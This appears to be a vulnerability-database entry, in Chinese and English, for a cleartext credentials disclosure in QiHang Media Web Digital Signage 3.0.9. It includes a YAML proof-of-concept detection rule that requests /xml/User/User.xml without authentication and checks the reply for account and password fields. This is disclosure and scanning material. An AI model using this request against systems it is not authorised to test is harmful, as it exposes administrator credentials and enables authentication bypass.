qihang-media-disclosure: QiHang Media Web Digital Signage 3.0.9 - Cleartext Credentials Disclosure

日期: 2025-09-01 | 影响软件: QiHang Media Web Digital Signage | POC: 已公开

漏洞描述

QiHang Media Web Digital Signage 3.0.9 suffers from a clear-text credentials disclosure vulnerability that allows an unauthenticated attacker to issue a request to an unprotected directory that hosts an XML file /xml/User/User.xml and obtain administrative login information that allows for a successful authentication bypass attack.

PoC代码[已公开]

id: qihang-media-disclosure

info:
  name: QiHang Media Web Digital Signage 3.0.9 - Cleartext Credentials Disclosure
  author: gy741
  severity: high
  description: |
    QiHang Media Web Digital Signage 3.0.9 suffers from a clear-text credentials disclosure vulnerability that allows an unauthenticated attacker to issue a request to an unprotected directory that hosts an XML file /xml/User/User.xml and obtain administrative login information that allows for a successful authentication bypass attack.
  reference:
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5579.php

rules:
  r0:
    request:
      method: GET
      path: /xml/User/User.xml
    expression: response.status == 200 && response.body.bcontains(b'<?xml version') && response.body.bcontains(b'<Users>') && response.body.bcontains(b'account=') && response.body.bcontains(b'password=')
expression: r0()

相关漏洞推荐